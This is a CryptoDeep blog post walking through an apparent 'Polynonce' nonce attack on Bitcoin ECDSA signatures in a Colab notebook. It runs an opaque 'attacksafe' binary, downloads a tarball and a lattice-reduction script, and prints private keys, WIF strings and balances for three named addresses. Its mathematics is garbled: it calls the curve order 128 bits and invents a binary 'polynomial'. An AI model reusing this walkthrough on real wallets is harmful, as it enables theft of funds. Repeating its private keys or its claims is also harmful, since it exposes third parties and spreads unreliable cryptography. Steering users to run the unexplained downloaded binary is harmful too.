POLYNONCE ATTACK we use BITCOIN signatures as a Polynomial to an arbitrarily high power of 128 bits to get a Private Key

By CryptoDeep | CRYPTODEEP | 17 Aug 2023

In this article, we will again touch on the topic: “Bitcoin’s Critical Vulnerability” and use the brand new attack of 2023 “POLYNONCE ATTACK” on all three examples . The very first mention of this attack is described in an article from “Kudelski Security” .

As a practical basis, we will take materials from our earlier article “ Speed ​​up secp256k1 with endomorphism” where the values ​​​​on the secp256k1 curve from Hal Finney   LAMBDA and BETA hide the depth of uncertainty of Bitcoin elliptic curves.

We can reveal a lot`Binary number (4 digits): "1111" // Hex number: "F" //`

We also know perfectly well the order of the secp256k1 curve which consists of 128 bits Binary number (4 digits): “1111” // Hex number: “F” //

``````n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141
``````

``1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111010111010101011101101110011100110101011110100100010100000001110111011111111010010010111101000110011010000001101100100000101000001``

We see that the polynomial as a unit in the binary code of an arbitrarily high degree of 128 bits modulo

`Speed ​​up secp256k1 with endomorphism`

Given this fact, the initial bit of the Bitcoin private key will be Binary number (4 digits): “1111” // Hex number: “F” //

“Polynonce Attack on Bitcoin”

Consider an example with a Bitcoin Address:

1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB

929d565c386a279cf7a0382ba48cab1f72d62e7cfb3ab97b4f211d5673bc4441

RawTX

``02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000``

Let’s go to the official website:  https://colab.research.google.com

Load `HEX`the -data through the utility `echo` and save it to a file: RawTX.txt

``!echo '02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000' > RawTX.txt``

To implement the attack, we will use the software

`www.attacksafe.ru/software`

Access rights:

``!chmod +x attacksafe``

``ls``

Application:

``!./attacksafe -help``

``````  -version:  software version
-list:     list of bitcoin attacks
-tool:     indicate the attack
-gpu:      enable gpu
-time:     work timeout
-server:   server mode
-port:     server port
-open:     open file
-save:     save file
-search:   vulnerability search
-stop:     stop at mode
-max:      maximum quantity in mode
-min:      minimum quantity per mode
-speed:    boost speed for mode
-range:    specific range
-crack:    crack mode
-field:    starting field
-point:    starting point
-inject:   injection regimen
-decode:   decoding mode``````

``!./attacksafe -version``

``Version 5.3.3. [ATTACKSAFE SOFTWARE, © 2023]``

`"ATTACKSAFE SOFTWARE"` includes all popular attacks on Bitcoin.

Let’s run a list of all attacks:

``!./attacksafe -list``

Let’s choose` -tool: polynonce_attack`

To get a specific `HEX`value `R,S,Z`for the signature `ECDSA`, we previously added data  `RawTX` through the utility `echo`to a text document and saved it as a file `RawTX.txt`

``02000000019e3de154f8b473a796b9e39dd279dff1d907a4d27a1d8b23a055f97b08ad4c6e310000006b483045022100b29bdfc27ddf6bebd0e77c84b31dc1bc64b5b2276c8d4147421e96ef85467e8d02204ddd8ff0ffa19658e3b417be5f64d9c425a4d9fcd76238b8538c1d605b229baf0121027b06fe78e39ced37586c42c9ac38d7b2d88ccdd4cd1bb38816c0933f9b8db695ffffffff0169020000000000001600145fc8e854994406f93ea5c7f3abccc5d319ae2a3100000000``

Launch  `-tool polynonce_attack` using software `“ATTACKSAFE SOFTWARE”`

``!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv``

We launched this attack from  `-tool polynonce_attack` and the result was saved to a file `SignatureRSZ.csv`

Now to see the successful result, open the file `SignatureRSZ.csv`

In order to calculate the private key to a Bitcoin Wallet from a file,  `SignatureRSZ.csv`we will install SageMath

Earlier we published an article , download  `tar-file`:  sage-9.3-Ubuntu_20.04-x86_64.tar.bz2

``````!wget https://cryptodeeptech.ru/sage-9.3-Ubuntu_20.04-x86_64.tar.bz2
!tar -xf sage-9.3-Ubuntu_20.04-x86_64.tar.bz2``````

Let’s go through the directory:

``cd SageMath/``

``ls``

Run  relocate-once.py  with the command:`Python-script:`

``!python3 relocate-once.py``

Move `"AttackSafe"`to `"SignatureRSZ.csv"`folder`"SageMath"`

``````!mv '/content/attacksafe' '/content/SageMath/attacksafe'
!mv '/content/SignatureRSZ.csv' '/content/SageMath/SignatureRSZ.csv'``````

``ls``

Download the script crack_weak_ECDSA_nonces_with_LLL.py from Dario Clavijo through the utility `wget`

``!wget https://raw.githubusercontent.com/demining/CryptoDeepTools/main/20PolynonceAttack/crack_weak_ECDSA_nonces_with_LLL.py``

Now let’s run  `SageMath` the command:

``!./sage -sh``

To calculate the private key to the Bitcoin Wallet, run the script crack_weak_ECDSA_nonces_with_LLL.py specifying the parameters`128 bits 4 sign`

``python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt``

``cat PrivateKey.txt``

Let’s open the file:`PrivateKey.txt`

We received the private key to the Bitcoin Wallet in `HEX`the format

``PrivKey = 0xf0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d``

Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

Result:

We received four identical initial`128 bits`

``````POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 f88ff4c8a9ea4b61b1e087d0c0988826
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 6849e83cd03d103bcc37aca8323c8d2f
POLYNONCE >> 93e43392cb31d5d1f75175ee64ce16b7 efc86216627af576c29c9c52a0fd10fe``````

Thanks to the value on the secp256k1 curve from  Hal Finney   LAMBDA and BETA revealed to us the same initial bits `128 bits`, since the initial bits of the private key to the Bitcoin Wallet begin with`Binary number (4 digits): ``"1111"`` // Hex number: ``"F"`` //`

Let’s check the HEX of the private key:

Install the module`bitcoin`

``!pip3 install bitcoin``

Let’s run the code:

``````from bitcoin import *

with open("PrivateKey.txt","r") as f:

content = [x.strip() for x in content]
f.close()

for x in content:

outfile.close()``````

Let’s open the file:`PrivateKeyAddr.txt`

`f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d:1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB`

``````ADDR: 1DxzwX4qC9PsWDSAzuWbJRzEwdGx3n9CJB
WIF:  L5HV2GiosXifcmijGCpFWdYiMRuXh4x4JVK29urGjfAWyasBYoDX
HEX:  f0a3e31646ce147bbd79bb6e45e6e9c8c4e51c535918c9b4cdca9528eb62172d``````

`BALANCE: \$ 3699.40`

Let’s look at other examples:

`№2`

Consider example #2 with a Bitcoin Address:

137a6fqt13bhtAkGZWrgcGM98NLCotszR2

c1da9d117e15883ba41539f558ac870f53865ea00f68a8ff8bc7e8a9ee67099b

RawTX

``010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000``

Let’s remove the files from the first example:

``````!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv

Load  `HEX` the -data through the utility  `echo` and save it to a file:  RawTX.txt

``````!echo '010000000103ebc5c4b817124d45ad15e398ec32e9b9b7549c1fc10300ecbf36648c3cb5d42c0000006a47304402204e97dae0ab6e4eee9529f68687907c05db9037d9fbdba78dd01a3338a48d95b602207794cb7aa308243dfbdd5c20225777cd6e01bd7c4f76bf36948aa29290129c2b0121036360352efcff6a823eabb25578a29392eab4d302955fd54ece900578d2ab83b8ffffffff0162020000000000001976a914154813f71552c59487efa3b16d62bfb009dc5f1e88ac00000000' > RawTX.txt
``````

Launch  `-tool polynonce_attack` using software `“ATTACKSAFE SOFTWARE”`

``!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv``

We launched this attack from  `-tool polynonce_attack` and the result was saved to a file `SignatureRSZ.csv`

Now to see the successful result, open the file `SignatureRSZ.csv`

Let’s run  `SageMath` the command:

``!./sage -sh``

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters `128 bits 4 sign`

``python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt``

``cat PrivateKey.txt``

Let’s open the file: `PrivateKey.txt`

We received the private key to the Bitcoin Wallet in  `HEX` the format

``PrivKey = 0xff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c``

Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

`https://github.com/demining/CryptoDeepTools/blob/main/20PolynonceAttack/example2/POLYNONCE.py`

Result:

We received four identical initial`128 bits`

``````POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 c5f6da6334586ed2bdc88a05f37bcf95
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 6f82fbd847c138ab48e778135e908149
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 5541022f8aeac81e5ce62e018d1cd722
POLYNONCE >> 5220dae0c281e1115b4dd69ea3500f70 80e88efaff419ecd84d7ded17dc548a7``````

Thanks to the value on the secp256k1 curve from  Hal Finney   LAMBDA and BETA revealed to us the same initial bits `128 bits`, since the initial bits of the private key to the Bitcoin Wallet begin with`Binary number (4 digits): ``"1111"`` // Hex number: ``"F"`` //`

Let’s check the HEX of the private key:

Let’s run the code:

``````from bitcoin import *

with open("PrivateKey.txt","r") as f:

content = [x.strip() for x in content]
f.close()

for x in content:

outfile.close()``````

Let’s open the file: `PrivateKeyAddr.txt`

``````ADDR: 137a6fqt13bhtAkGZWrgcGM98NLCotszR2
WIF:  L5mQfFuzR3rzLtneJ7Tcv64JrHjCpK64UN4JRdGDxCUTbQ8NfHxo
HEX:  ff0178fa717374f7e74d43f00150748967ea04b64241ec10a10f62debb70868c``````

`BALANCE: \$ 1133.73`

Let’s look at other examples:

`№3`

Consider example #3 with a Bitcoin Address:

1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt

fa80af660fc444d87853137506df02e5c75e8c2bf75dc44589b60356867a6d98

RawTX

``01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000``

Let’s remove the files from the second example:

``````!rm RawTX.txt
!rm NoncesHEX.txt
!rm PrivateKey.txt
!rm SignatureRSZ.csv

Load  `HEX` the -data through the utility  `echo` and save it to a file:  RawTX.txt

``````!echo '01000000016eb80d35b08164302e49f88d8f86bf2827a91a5650149be38f4f73751ff41437060000006a473044022043d4c025a0f3be366a0d768c721b9b9191e0c3db6f2c6bfe34e8fb24af7f379102205a4fe2cc6944e00309c35619ff1242301b84d4728b863f97326f56dbd7a782220121027ccccf5f56ed78c2a761721ff3da0f76b792fbe4eae2ac73e7b4651bc3ef19cdffffffff01c057010000000000232103bec42e5d718b0e5b3853243c9bcf00dd671a335b0eb99fd8ca32f8d5784a9476ac00000000' > RawTX.txt
``````

Launch  `-tool polynonce_attack` using software `“ATTACKSAFE SOFTWARE”`

``!./attacksafe -tool polynonce_attack -open RawTX.txt -save SignatureRSZ.csv``

We launched this attack from  `-tool polynonce_attack` and the result was saved to a file `SignatureRSZ.csv`

Now to see the successful result, open the file `SignatureRSZ.csv`

Let’s run  `SageMath` the command:

``!./sage -sh``

To calculate the private key to the Bitcoin Wallet, run the script  crack_weak_ECDSA_nonces_with_LLL.py  specifying the parameters `128 bits 4 sign`

``python3 crack_weak_ECDSA_nonces_with_LLL.py SignatureRSZ.csv 128 4 > PrivateKey.txt``

``cat PrivateKey.txt``

Let’s open the file: `PrivateKey.txt`

We received the private key to the Bitcoin Wallet in  `HEX` the format

``PrivKey = 0xfbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf``

Check POLYNONCE for each ECDSA signature

To do this, use the code from GITHUB

Result:

We received four identical initial`128 bits`

``````POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 fbc50a7158b3d9fd7fd58fe0874f20c1
POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 d4de8d539655ecf0d50fd32187c3c467
POLYNONCE >> d7460c5b1a98f6d0443ae1cfe1f17814 6726aea1a6fd64d82dc657670352de72

Thanks to the value on the secp256k1 curve from  Hal Finney   LAMBDA and BETA revealed to us the same initial bits `128 bits`, since the initial bits of the private key to the Bitcoin Wallet begin with`Binary number (4 digits): ``"1111"`` // Hex number: ``"F"`` //`

Let’s check the HEX of the private key:

Let’s run the code:

``````from bitcoin import *

with open("PrivateKey.txt","r") as f:

content = [x.strip() for x in content]
f.close()

for x in content:

outfile.close()``````

Let’s open the file: `PrivateKeyAddr.txt`

``````ADDR: 1HxrEeC2X8UEcSvsemPJtTqrnbAetGWYUt
WIF:  L5f7p5bReuXLm3d7rFkpPyGQ1GNpiGuj8QuQ6rNCKXC9bs3J9GEY
HEX:  fbc50a7158b3d9fd7fd58fe0874f20c10c650975dc118163debf442a44203fdf``````

`BALANCE: \$ 459.24`

Literature:

• A Novel Related Nonce Attack for ECDSA, Marco Macchetti [Kudelski Security, Switzerland] (2023)
• Gallant, Robert P., Robert J. Lambert, and Scott A. Wanston. “Faster point multiplication on elliptic curves with efficient endomorphisms” . Annual International Conference on Cryptology, pp. 190–200. Springer, Berlin, Heidelberg, (2001)
• Hankerson, Darrell, Alfred J. Menezes, and Scott Wanston. “A Guide to Elliptic Curve Cryptography” . Computer Reviews 46, no. 1 (2005)
• Hal Finney. bitcointalk –  “Acceleration of signature verification” . (2011)  https://bitcointalk.org/index.php?topic=3238.0
• Blahut, Richard E.  “Cryptography and Secure Communication” . Cambridge University Press, (2014)

Source

ATTACKSAFE SOFTWARE

Telegram: https://t.me/cryptodeeptech

Video: https://youtu.be/7nKs_KHtyn4

Source: https://cryptodeeptech.ru/polynonce-attack

CryptoDeep

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency

CRYPTODEEP

Financial security of data and secp256k1 elliptic curve cryptography against weak ECDSA signatures in BITCOIN cryptocurrency [email protected] - Email for all questions. The creators of the software are not responsible for the use of materials Donation Address: ♥ BTC: 1Lw2gTnMpxRUNBU85Hg4ruTwnpUPKdf3nV ♥ETH: 0xaBd66CF90898517573f19184b3297d651f7b90bf ♥ YooMoney.ru/to/410011415370470

Send a \$0.01 microtip in crypto to the author, and earn yourself as you read!

20% to author / 80% to me.
We pay the tips from our rewards pool.